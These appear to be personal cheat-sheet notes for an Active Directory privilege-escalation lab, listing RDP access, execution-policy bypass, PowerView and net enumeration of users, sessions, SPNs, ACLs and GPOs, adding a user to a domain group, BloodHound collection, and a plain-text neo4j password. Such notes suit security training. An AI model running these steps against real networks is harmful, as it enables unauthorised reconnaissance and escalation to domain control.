Enumeration

NOTE: Goal is to privilege escalate to Domain Administrator

Initial Access

RDP

xfreerdp3 /u:'<Username>' /d:'<Domain Name>' /p:'<Password>' /v:<Target IP Address> /dynamic-resolution +clipboard /drive:/home/kali/offsec/downloads,/shared

Enumeration

Manual

NOTE: Make sure to run the following!

powershell -ep bypass

Get users on domain

net user /domain

Get info on particular user

net user <Username> /domain

Get groups on domain

net group /domain

Get info on particular CUSTOM group

net group "<Group Name>" /domain

PowerView

NOTE: Remember to run the following

  • powershell -ep bypass

  • Import-Module .\PowerView.ps1

Enumerate Users in the Domain

Get-NetUser

To get filtered result

Get-NetUser | select <Field Name> ...

EXAMPLE:

Get-NetUser | select samaccountname, cn, pwdlastset, lastlogon

To get specific information of a particular user

Get-NetUser <Username>

Enumerate Groups in the Domain

Get-NetGroup

To get filtered result

Get-NetGroup | select <Field name> ...

EXAMPLE:

Get-NetGroup | select cn

To get specific information of a particular group

Get-NetGroup <Group Name>

Enumerate Computers in the Domain

Get-NetComputer

To get filtered result

Get-NetComputer | select <Field name> ...

EXAMPLE:

Get-NetComputer | select operatingsystem, dnshostname

To get specific information of a particular computer

Get-NetComputer <DNS Host Name>

To look for administrative rights on other computer for the current user

Find-LocalAdminAccess

To look for logged on users on target machine

Get-NetSession -ComputerName <Computer Name> -Verbose

NOTE: If something is not right check for permission.

Permissions for NetSessionEnum are defined in SrvsvcSessionInfo registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity)

Alternatives

C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>

NOTE: Remote machine must have Remote Registry service enabled

To check for permission

Get-Acl -Path <Registery Hive>:<Registry Path> | fl

EXAMPLE:

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl

To enumerate Service Principal Name

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To enumerate ACEs

Get-ObjectAcl -Identity "<Username | Group Name>"

NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier

To enumerate interesting ACL

Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

To enumerate all user that has ActiveDirectoryRights = GenericAll under a group

Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

To enumerate all ActiveDirectoryRights = GenericWrite under a group

Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRights

To convert SID to Name in bulk

"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToName

To convert SID to Name individually

Convert-SidToName "<SID>"

Add user into group in domain

net group "<Group Name>" <Username> /add /domain

To enumerate all shares on Domain

Find-DomainShare

To enumerate shares available to current user

Find-DomainShare -CheckShareAccess

To enumerate Group Policy

Get-GPO -Name "<Group Policy Name>"

EXAMPLE:

Get-GPO -Name "Default Domain Policy"

To enumerate permission on the group policy

Get-GPPermission -Guid <Group Unique ID> -TargetType User -TargetName <Username>

NOTE: Only if the permission either contains "ModifySecurity" or "FullControl"

BloodHound

To import BloodHound

Import-Module C:\Tools\Bloodhound.ps1

To begin enumerationg on BloodHound

Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"

On kali:

sudo neo4j start

NOTE: Head over to http://localhost:7474

Username: neo4j

Password: arctic-iris-zipper-prism-courage-7161

Last updated